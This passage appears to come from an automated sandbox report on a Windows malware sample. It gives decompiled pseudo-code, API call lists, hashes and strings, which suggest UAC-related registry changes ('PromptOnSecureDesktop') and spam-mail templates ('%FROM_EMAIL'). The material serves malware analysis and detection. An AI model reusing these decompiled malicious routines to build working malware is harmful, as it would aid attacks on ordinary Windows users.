                                                                                • InterlockedExchange.KERNEL32(?,00000001), ref: 00403128
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountTick$ExchangeInterlockedSleep
                                                                                • String ID:
                                                                                • API String ID: 2207858713-0
                                                                                • Opcode ID: 5475aadbbb6481cfb66701b566d3724b8cf1f0baef2ba10e865a3ab4c750e63b
                                                                                • Instruction ID: 9edc608f4d32da9f9de986fa19dd3c9deb40157c310ade5cfb00ff6fe32d5b40
                                                                                • Opcode Fuzzy Hash: 5475aadbbb6481cfb66701b566d3724b8cf1f0baef2ba10e865a3ab4c750e63b
                                                                                • Instruction Fuzzy Hash: 51E0C235200215ABDB00AF75BD44B8A6E9EDF8C762F014432F205EA1E0C9F44D51897A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040E177 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148fileCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 93%
                                                                                			E0040E177(signed int _a4, long _a8) {
				void* _v8;
				void* _v12;
				void* __ecx;
				void* _t31;
				void* _t34;
				intOrPtr* _t36;
				void* _t38;
				intOrPtr* _t41;
				void* _t43;
				void* _t46;
				void* _t47;
				void* _t57;
				void* _t58;
				void* _t67;
				void* _t68;
				void* _t72;
				void* _t77;

				_push(_t58);
				_push(_t58);
				if(_a8 != 0) {
					L2:
					if( *0x4136c0 == 0) {
						L20:
						_t31 = 1;
						L21:
						return _t31;
					}
					if((_a4 & 0x00000001) != 0) {
						_t46 = E0040DFE2(_t58, 1,  &_v8,  &_a8);
						_t67 = _t67 + 0xc;
						if(_t46 != 0) {
							_t81 = _a8;
							if(_a8 != 0) {
								_t47 = E0040DBCF(_t81, 0x40000000, 2);
								_pop(_t58);
								_v12 = _t47;
								if(_t47 != 0xffffffff) {
									_t57 = _v8;
									if(_t57 != 0 && _a8 != 0) {
										E00402544(_t57, _t57, _a8, 0xe4, 0xc8);
										_t67 = _t67 + 0x14;
										if(WriteFile(_v12, _t57, _a8,  &_a8, 0) != 0) {
											 *0x4136c0 =  *0x4136c0 & 0x00000000;
										}
									}
									CloseHandle(_v12);
								}
							}
						}
					}
					if((_a4 & 0x00000002) == 0) {
						L19:
						goto L20;
					}
					_t34 = E0040DFE2(_t58, 2,  &_v8,  &_a8);
					_t68 = _t67 + 0xc;
					if(_t34 == 0 || _a8 == 0) {
						goto L19;
					} else {
						E00402544(_v8, _v8, _a8, 0xe4, 0xc8);
						_t36 = E00402544(0x4128f8, 0x4110d0, 7, 0xe4, 0xc8);
						_t38 = E0040E095(0x80000001, E00402544(0x4122f8, 0x4110bc, 0x14, 0xe4, 0xc8), _t36, _v8, _a8);
						_t72 = _t68 + 0x50;
						if(_t38 != 0) {
							L17:
							 *0x4136c0 =  *0x4136c0 & 0x00000000;
							L18:
							E0040EE2A(_t58, 0x4122f8, 0, 0x100);
							E0040EE2A(_t58, 0x4128f8, 0, 0x100);
							goto L19;
						}
						_t41 = E00402544(0x4128f8, 0x4110d0, 7, 0xe4, 0xc8);
						_t43 = E0040E095(0x80000001, E00402544(0x4122f8, 0x4110a0, 0x19, 0xe4, 0xc8), _t41, _v8, _a8);
						_t72 = _t72 + 0x3c;
						if(_t43 == 0) {
							goto L18;
						}
						goto L17;
					}
				}
				_t31 = 1;
				_t77 =  *0x4120ec - _t31; // 0x1
				if(_t77 != 0) {
					goto L21;
				}
				goto L2;
			}




















                                                                                0x0040e17a
                                                                                0x0040e17b
                                                                                0x0040e182
                                                                                0x0040e193
                                                                                0x0040e199
                                                                                0x0040e312
                                                                                0x0040e314
                                                                                0x0040e315
                                                                                0x0040e317
                                                                                0x0040e317
                                                                                0x0040e1ad
                                                                                0x0040e1b9
                                                                                0x0040e1be
                                                                                0x0040e1c3
                                                                                0x0040e1c5
                                                                                0x0040e1c8
                                                                                0x0040e1d1
                                                                                0x0040e1d7
                                                                                0x0040e1d8
                                                                                0x0040e1de
                                                                                0x0040e1e0
                                                                                0x0040e1e5
                                                                                0x0040e1f4
                                                                                0x0040e1f9
                                                                                0x0040e211
                                                                                0x0040e213
                                                                                0x0040e213
                                                                                0x0040e211
                                                                                0x0040e21d
                                                                                0x0040e21d
                                                                                0x0040e1de
                                                                                0x0040e1c8
                                                                                0x0040e1c3
                                                                                0x0040e227
                                                                                0x0040e310
                                                                                0x00000000
                                                                                0x0040e311
                                                                                0x0040e237
                                                                                0x0040e23c
                                                                                0x0040e241
                                                                                0x00000000
                                                                                0x0040e251
                                                                                0x0040e25c
                                                                                0x0040e278
                                                                                0x0040e29e
                                                                                0x0040e2a3
                                                                                0x0040e2a8
                                                                                0x0040e2eb
                                                                                0x0040e2eb
                                                                                0x0040e2f2
                                                                                0x0040e2fb
                                                                                0x0040e308
                                                                                0x00000000
                                                                                0x0040e30d
                                                                                0x0040e2be
                                                                                0x0040e2df
                                                                                0x0040e2e4
                                                                                0x0040e2e9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040e2e9
                                                                                0x0040e241
                                                                                0x0040e186
                                                                                0x0040e187
                                                                                0x0040e18d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000

                                                                                APIs
                                                                                • WriteFile.KERNEL32(00000001,0040DAE0,00000000,00000000,00000000), ref: 0040E209
                                                                                • CloseHandle.KERNEL32(00000001,00000003), ref: 0040E21D
                                                                                  • Part of subcall function 0040E095: RegCreateKeyExA.ADVAPI32(80000001,0040E2A3,00000000,00000000,00000000,00020106,00000000,0040E2A3,00000000,000000E4), ref: 0040E0B2
                                                                                  • Part of subcall function 0040E095: RegSetValueExA.ADVAPI32(0040E2A3,?,00000000,00000003,80000001,000FF000,?,?,?,?,000000C8,PromptOnSecureDesktop), ref: 0040E127
                                                                                  • Part of subcall function 0040E095: RegDeleteValueA.ADVAPI32(0040E2A3,?,?,?,?,?,000000C8,PromptOnSecureDesktop), ref: 0040E158
                                                                                  • Part of subcall function 0040E095: RegCloseKey.ADVAPI32(0040E2A3,?,?,?,?,000000C8,PromptOnSecureDesktop,?,?,?,?,?,?,?,?,0040E2A3), ref: 0040E161
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseValue$CreateDeleteFileHandleWrite
                                                                                • String ID: PromptOnSecureDesktop
                                                                                • API String ID: 4151426672-2980165447
                                                                                • Opcode ID: b35f9f727470473fe34b0fcdae204b38b052469ea0fd64ba9bdd2db24e4b8a6b
                                                                                • Instruction ID: b34283ca0245a4d5345772c7626065eb71a791ff6ac24fd5689ebe733b27dfc9
                                                                                • Opcode Fuzzy Hash: b35f9f727470473fe34b0fcdae204b38b052469ea0fd64ba9bdd2db24e4b8a6b
                                                                                • Instruction Fuzzy Hash: 5D41DB71940214BADB205E938C06FDB3F6CEB44754F1084BEFA09B41D2E6B99A60D6BD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0208E3DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • WriteFile.KERNEL32(00000001,020844E2,00000000,00000000,00000000), ref: 0208E470
                                                                                • CloseHandle.KERNEL32(00000001,00000003), ref: 0208E484
                                                                                  • Part of subcall function 0208E2FC: RegCreateKeyExA.ADVAPI32(80000001,0208E50A,00000000,00000000,00000000,00020106,00000000,0208E50A,00000000,000000E4), ref: 0208E319
                                                                                  • Part of subcall function 0208E2FC: RegSetValueExA.ADVAPI32(0208E50A,?,00000000,00000003,80000001,000FF000,?,?,?,?,000000C8,PromptOnSecureDesktop), ref: 0208E38E
                                                                                  • Part of subcall function 0208E2FC: RegDeleteValueA.ADVAPI32(0208E50A,?,?,?,?,?,000000C8,PromptOnSecureDesktop), ref: 0208E3BF
                                                                                  • Part of subcall function 0208E2FC: RegCloseKey.ADVAPI32(0208E50A,?,?,?,?,000000C8,PromptOnSecureDesktop,?,?,?,?,?,?,?,?,0208E50A), ref: 0208E3C8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseValue$CreateDeleteFileHandleWrite
                                                                                • String ID: PromptOnSecureDesktop
                                                                                • API String ID: 4151426672-2980165447
                                                                                • Opcode ID: f9347908c3accb151d66d4a2045a2710535659ff764f1ec32379916764927f64
                                                                                • Instruction ID: 2b98ff685954140c816a65b74b25de078f968a8bf133daad0dd8e89027b85047
                                                                                • Opcode Fuzzy Hash: f9347908c3accb151d66d4a2045a2710535659ff764f1ec32379916764927f64
                                                                                • Instruction Fuzzy Hash: 4E41A4B2900314BBEB217E61CC45FEB3BADEB04724F148035FE49A4191E7B58650EAA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 02088330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 146registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,00000000,00000101,?), ref: 020883C6
                                                                                • RegCloseKey.ADVAPI32(?,?,?,00000000,00000101,?), ref: 02088477
                                                                                  • Part of subcall function 020869C3: SetFileAttributesA.KERNEL32(?,00000080), ref: 020869E5
                                                                                  • Part of subcall function 020869C3: SetFileAttributesA.KERNEL32(?,00000002), ref: 02086A26
                                                                                  • Part of subcall function 020869C3: GetFileSize.KERNEL32(000000FF,00000000), ref: 02086A3A
                                                                                  • Part of subcall function 0208EE95: GetProcessHeap.KERNEL32(00000000,?,00000000,02081DCF,?), ref: 0208EEA8
                                                                                  • Part of subcall function 0208EE95: HeapFree.KERNEL32(00000000), ref: 0208EEAF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$AttributesHeap$CloseFreeOpenProcessSize
                                                                                • String ID: PromptOnSecureDesktop
                                                                                • API String ID: 359188348-2980165447
                                                                                • Opcode ID: c1a48b1ac5137ef9544f8785227e3e3eae959810ca81eb1dd85f310690abdf03
                                                                                • Instruction ID: 2724858bd519a30ad1be6d2ae0aba5c1749d747f9f184cd50d72b4e1b9a4c2ab
                                                                                • Opcode Fuzzy Hash: c1a48b1ac5137ef9544f8785227e3e3eae959810ca81eb1dd85f310690abdf03
                                                                                • Instruction Fuzzy Hash: 864171B290020DBFEB11FBA09D80EFF77ADEB04304F5484A6E584D6110FBB05A94AB64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0208E631 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 136registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegOpenKeyExA.ADVAPI32(80000001,0208E859,00000000,00020119,0208E859,PromptOnSecureDesktop), ref: 0208E64D
                                                                                • RegCloseKey.ADVAPI32(0208E859,?,?,?,?,000000C8,000000E4), ref: 0208E787
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseOpen
                                                                                • String ID: PromptOnSecureDesktop
                                                                                • API String ID: 47109696-2980165447
                                                                                • Opcode ID: ca61599b3ee270ad7d52ab6b22e6fbb0cb95010ae32332e4c3022532ab02544e
                                                                                • Instruction ID: c257cf7e6b94d81f34863d2b954edc28be7cd67dc6b021f1ba82f4bda334e80e
                                                                                • Opcode Fuzzy Hash: ca61599b3ee270ad7d52ab6b22e6fbb0cb95010ae32332e4c3022532ab02544e
                                                                                • Instruction Fuzzy Hash: 434109B2D0021DBFDF11EFA4DC84DEEBBB9FB08344F144466FA40A6150E3719A559B60
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0208AFF0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLocalTime.KERNEL32(?), ref: 0208AFFF
                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 0208B00D
                                                                                  • Part of subcall function 0208AF6F: gethostname.WS2_32(?,00000080), ref: 0208AF83
                                                                                  • Part of subcall function 0208AF6F: lstrcpy.KERNEL32(?,00410B90), ref: 0208AFE6
                                                                                  • Part of subcall function 0208331C: gethostname.WS2_32(?,00000080), ref: 0208333F
                                                                                  • Part of subcall function 0208331C: gethostbyname.WS2_32(?), ref: 02083349
                                                                                  • Part of subcall function 0208AA0A: inet_ntoa.WS2_32(00000000), ref: 0208AA10
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Time$gethostname$FileLocalSystemgethostbynameinet_ntoalstrcpy
                                                                                • String ID: %OUTLOOK_BND_
                                                                                • API String ID: 1981676241-3684217054
                                                                                • Opcode ID: 8e8a8b671ed14d1768aa81df58b4956713f73d3ffbf43b844f6b98d3c95244e6
                                                                                • Instruction ID: 325e11499c122cf16a0d6d67822d6b8668a70156c8ba697a81960d0e9256c09b
                                                                                • Opcode Fuzzy Hash: 8e8a8b671ed14d1768aa81df58b4956713f73d3ffbf43b844f6b98d3c95244e6
                                                                                • Instruction Fuzzy Hash: 3F41FCB290034CABDB25AFA0DC45EEF3BADFB08304F14442AF92592151EA75E6549F54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 02089452 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ShellExecuteA.SHELL32(00000000,00000000,00000020,00000022,00000000,00000000), ref: 02089536
                                                                                • Sleep.KERNEL32(000001F4), ref: 0208955D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExecuteShellSleep
                                                                                • String ID:
                                                                                • API String ID: 4194306370-3916222277
                                                                                • Opcode ID: 8ec43b0dbd72852d903c080b258003cf27e186f124a7becd1b7b46641cf4f594
                                                                                • Instruction ID: 5d16e66af269ab9b43f48f8727283cb76ee4f48751b8922d73db173501e5493b
                                                                                • Opcode Fuzzy Hash: 8ec43b0dbd72852d903c080b258003cf27e186f124a7becd1b7b46641cf4f594
                                                                                • Instruction Fuzzy Hash: 4541E4B190838D6FEB77BB64D888BFB3BE49B02314F1441A5D4C2973A2D7B44981E711
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0208BC7A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 0208B9D9
                                                                                • InterlockedIncrement.KERNEL32(00413648), ref: 0208BA3A
                                                                                • InterlockedIncrement.KERNEL32(?), ref: 0208BA94
                                                                                • GetTickCount.KERNEL32 ref: 0208BB79
                                                                                • GetTickCount.KERNEL32 ref: 0208BB99
                                                                                • InterlockedIncrement.KERNEL32(?), ref: 0208BE15
                                                                                • closesocket.WS2_32(00000000), ref: 0208BEB4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountIncrementInterlockedTick$closesocket
                                                                                • String ID: %FROM_EMAIL
                                                                                • API String ID: 1869671989-2903620461
                                                                                • Opcode ID: 0090938f495b36ecde0c2704714dbc7a7bc2631707f40fe0f7850b313d5ec50d
                                                                                • Instruction ID: 0333b5a0ab3b6e0270b1a9a042e86047f2cee39b6ad9d7a08e7be6a59af01e56
                                                                                • Opcode Fuzzy Hash: 0090938f495b36ecde0c2704714dbc7a7bc2631707f40fe0f7850b313d5ec50d
                                                                                • Instruction Fuzzy Hash: 23318B72500348EFDF65EFA4DC84AEEB7A9EB48304F204056FA64C2160EB709685DF14
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00408CEE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 72%
                                                                                			E00408CEE() {
				intOrPtr* _v8;
				intOrPtr _v12;
				long _t15;
				char _t17;
				intOrPtr _t19;
				intOrPtr* _t20;
				void* _t25;
				signed int _t31;
				signed char _t35;
				signed int _t36;
				char* _t41;
				intOrPtr* _t42;
				signed int _t45;

				_push(_t34);
				_t31 = 0;
				if( *0x413380 == 0) {
					L17:
					return _t15;
				}
				_t15 = GetTickCount() -  *0x413388;
				if(_t15 < 0xea60) {
					goto L17;
				}
				_t41 =  *0x413380;
				_t17 =  *_t41;
				_t45 =  *(_t41 + 1);
				_t42 = _t41 + 5;
				_v12 = _t17;
				if(_t17 <= 0) {
					L16:
					_t15 = GetTickCount();
					 *0x413388 = _t15;
					goto L17;
				} else {
					_v8 = _t42;
					do {
						_t35 =  *_v8;
						if(_t35 != 8) {
							if(_t35 != 9) {
								_t36 = _t35;
								_t19 =  *((intOrPtr*)(0x413300 + _t36 * 4));
								if(_t19 == 0) {
									goto L12;
								}
								_t9 = _t19 + 0x34; // 0x3b10c483
								if(_t36 ==  *_t9) {
									_t13 = _t19 + 0x50; // 0x7486850
									_t20 =  *_t13;
									if(_t20 != 0) {
										 *_t20(_t45 >>  *(_t31 * 5 + _t42) & 0x00000001);
									}
									goto L16;
								}
								goto L12;
							}
							_t25 = E0040A688(_t45 >> _t35 & 0x00000001);
							L8:
							if(_t25 != 0) {
								_t6 = _v8 + 1; // 0x3cc6
								_t45 = _t45 |  *_t6;
							}
							goto L12;
						}
						_t25 = E0040A677(_t45 >> _t35 & 0x00000001);
						goto L8;
						L12:
						_v8 = _v8 + 5;
						_t31 = _t31 + 1;
					} while (_t31 < _v12);
					goto L16;
				}
			}
















                                                                                0x00408cf2
                                                                                0x00408cf4
                                                                                0x00408cfc
                                                                                0x00408dae
                                                                                0x00408db0
                                                                                0x00408db0
                                                                                0x00408d08
                                                                                0x00408d13
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00408d1b
                                                                                0x00408d21
                                                                                0x00408d24
                                                                                0x00408d27
                                                                                0x00408d2a
                                                                                0x00408d2f
                                                                                0x00408da1
                                                                                0x00408da1
                                                                                0x00408da8
                                                                                0x00000000
                                                                                0x00408d31
                                                                                0x00408d31
                                                                                0x00408d34
                                                                                0x00408d37
                                                                                0x00408d3c
                                                                                0x00408d50
                                                                                0x00408d6c
                                                                                0x00408d6f
                                                                                0x00408d78
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00408d7a
                                                                                0x00408d7d
                                                                                0x00408d8b
                                                                                0x00408d8b
                                                                                0x00408d90
                                                                                0x00408d9e
                                                                                0x00408da0
                                                                                0x00000000
                                                                                0x00408d90
                                                                                0x00000000
                                                                                0x00408d7d
                                                                                0x00408d5a
                                                                                0x00408d5f
                                                                                0x00408d62
                                                                                0x00408d67
                                                                                0x00408d67
                                                                                0x00408d67
                                                                                0x00000000
                                                                                0x00408d62
                                                                                0x00408d46
                                                                                0x00000000
                                                                                0x00408d7f
                                                                                0x00408d7f
                                                                                0x00408d83
                                                                                0x00408d84
                                                                                0x00000000
                                                                                0x00408d89

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountTick
                                                                                • String ID: localcfg
                                                                                • API String ID: 536389180-1857712256
                                                                                • Opcode ID: f778bec48d6853c61bba66ff70abee8b380bd23c812c2bd80f901189d0bf267b
                                                                                • Instruction ID: 1ef816322ecc1e041cdf399b9b138f6358d408137adc4a714cdb07e14db9ba06
                                                                                • Opcode Fuzzy Hash: f778bec48d6853c61bba66ff70abee8b380bd23c812c2bd80f901189d0bf267b
                                                                                • Instruction Fuzzy Hash: 0821C631610115AFCB109F64DE8169ABBB9EF20311B25427FD881F72D1DF38E940875C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040BFCE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                • Type = %d: works = %d cur_thr = %d num_thr = %d integr = %d integr_nl = %d fCntrl = %d time_ok_filt = %d cntr = %d time_nl_filt = %d last_time_work = %d last_time_getem = %d last_time_calc = %d last_time_nl, xrefs: 0040C057
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountTickwsprintf
                                                                                • String ID: Type = %d: works = %d cur_thr = %d num_thr = %d integr = %d integr_nl = %d fCntrl = %d time_ok_filt = %d cntr = %d time_nl_filt = %d last_time_work = %d last_time_getem = %d last_time_calc = %d last_time_nl
                                                                                • API String ID: 2424974917-1012700906
                                                                                • Opcode ID: 06c76dfdee32e392c5b9e14bf2ce1b6ffedea00b213a31f1363bbf4a57a4f60a
                                                                                • Instruction ID: 59a0723085258e1b6130595cff45262f63c8180c8ffe05f2a9b9c441a6a96c57
                                                                                • Opcode Fuzzy Hash: 06c76dfdee32e392c5b9e14bf2ce1b6ffedea00b213a31f1363bbf4a57a4f60a
                                                                                • Instruction Fuzzy Hash: 53115672200100FFDB529BA9DD44E567FA6FB88319B3491ACF6188A166D633D863EB50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004038F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55threadCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E004038F0(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _t29;
				intOrPtr _t43;
				intOrPtr _t45;
				intOrPtr _t50;

				if(_a8 <= 0) {
					L14:
					return _t29;
				}
				_t29 = E004030FA(0x412c00);
				_v8 = 0;
				if(_a8 <= 0) {
					L13:
					 *0x412c00 =  *0x412c00 & 0x00000000;
					goto L14;
				} else {
					do {
						_t50 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + _v8 * 4))));
						_t45 =  *((intOrPtr*)(_t50 - 0x24));
						if( *((intOrPtr*)(_t50 - 0x14)) != GetCurrentThreadId()) {
							_t10 = _t50 - 0x1c;
							 *_t10 =  *(_t50 - 0x1c) - 1;
							if( *_t10 < 0) {
								 *(_t50 - 0x1c) =  *(_t50 - 0x1c) & 0x00000000;
							}
							 *((intOrPtr*)(_t50 - 0x14)) = GetCurrentThreadId();
						}
						 *((intOrPtr*)(_t50 - 0xc)) =  *((intOrPtr*)(_t50 - 0xc)) + 1;
						if( *((intOrPtr*)(_t50 - 0xc)) >=  *((intOrPtr*)(_t50 - 8))) {
							_t43 = 2;
							 *((intOrPtr*)(_t50 - 0x20)) = _t43;
							 *((intOrPtr*)(_t45 + 0x10)) =  *((intOrPtr*)(_t45 + 0x10)) + 1;
							_t34 =  *((intOrPtr*)(_t45 + 0x10));
							if( *((intOrPtr*)(_t45 + 0x10)) >=  *((intOrPtr*)(_t45 + 0x14))) {
								 *((intOrPtr*)(_t45 + 8)) = _t43;
								if( *0x412bfc == 0) {
									E00406509(_t34);
									 *0x412bfc = 1;
								}
							}
						}
						_v8 = _v8 + 1;
						_t29 = _v8;
					} while (_t29 < _a8);
					goto L13;
				}
			}








                                                                                0x004038fa
                                                                                0x00403989
                                                                                0x0040398b
                                                                                0x0040398b
                                                                                0x00403905
                                                                                0x0040390b
                                                                                0x00403911
                                                                                0x00403982
                                                                                0x00403982
                                                                                0x00000000
                                                                                0x00403913
                                                                                0x0040391b
                                                                                0x00403924
                                                                                0x00403926
                                                                                0x0040392e
                                                                                0x00403930
                                                                                0x00403930
                                                                                0x00403933
                                                                                0x00403935
                                                                                0x00403935
                                                                                0x0040393b
                                                                                0x0040393b
                                                                                0x0040393e
                                                                                0x00403947
                                                                                0x0040394b
                                                                                0x0040394c
                                                                                0x0040394f
                                                                                0x00403952
                                                                                0x00403958
                                                                                0x0040395a
                                                                                0x00403964
                                                                                0x00403966
                                                                                0x0040396b
                                                                                0x0040396b
                                                                                0x00403964
                                                                                0x00403958
                                                                                0x00403975
                                                                                0x00403978
                                                                                0x0040397b
                                                                                0x00000000
                                                                                0x00403981

                                                                                APIs
                                                                                  • Part of subcall function 004030FA: GetTickCount.KERNEL32 ref: 00403103
                                                                                  • Part of subcall function 004030FA: InterlockedExchange.KERNEL32(?,00000001), ref: 00403128
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00403929
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00403939
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CurrentThread$CountExchangeInterlockedTick
                                                                                • String ID: %FROM_EMAIL
                                                                                • API String ID: 3716169038-2903620461
                                                                                • Opcode ID: ef9999c53fb079ee60b66104ed5eee9301c2c40c50ee899f7204c173007e787c
                                                                                • Instruction ID: b7f4056d5a805f6dc72f55654bcd4db07a73235d6c8b9c95532e416c15eafef7
                                                                                • Opcode Fuzzy Hash: ef9999c53fb079ee60b66104ed5eee9301c2c40c50ee899f7204c173007e787c
                                                                                • Instruction Fuzzy Hash: 7B113DB5900214EFD720DF16D581A5DF7F8FB05716F11856EE844A7291C7B8AB80CFA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0208709D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetUserNameW.ADVAPI32(?,?), ref: 020870BC
                                                                                • LookupAccountNameW.ADVAPI32(00000000,?,?,00000104,?,?,?), ref: 020870F4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Name$AccountLookupUser
                                                                                • String ID: |
                                                                                • API String ID: 2370142434-2343686810
                                                                                • Opcode ID: 72898ebcb6f81f1198030622a9bf6313c93c94cde1355ae2af79125b690e915f
                                                                                • Instruction ID: aeaecfcc7673227d1802c771807a239085fca7687d45ce6d91001a718f86b38a
                                                                                • Opcode Fuzzy Hash: 72898ebcb6f81f1198030622a9bf6313c93c94cde1355ae2af79125b690e915f
                                                                                • Instruction Fuzzy Hash: DB112E76900218EBDF51DBD8DC84AEFB7BCAB04305F2441A6E551E6068D7709784DBA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00401B71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 60%
                                                                                			E00401B71() {
				long _v8;
				long _v12;
				void* _v27;
				char _v28;
				signed int _t12;
				signed int _t28;

				_v28 = 0;
				asm("stosd");
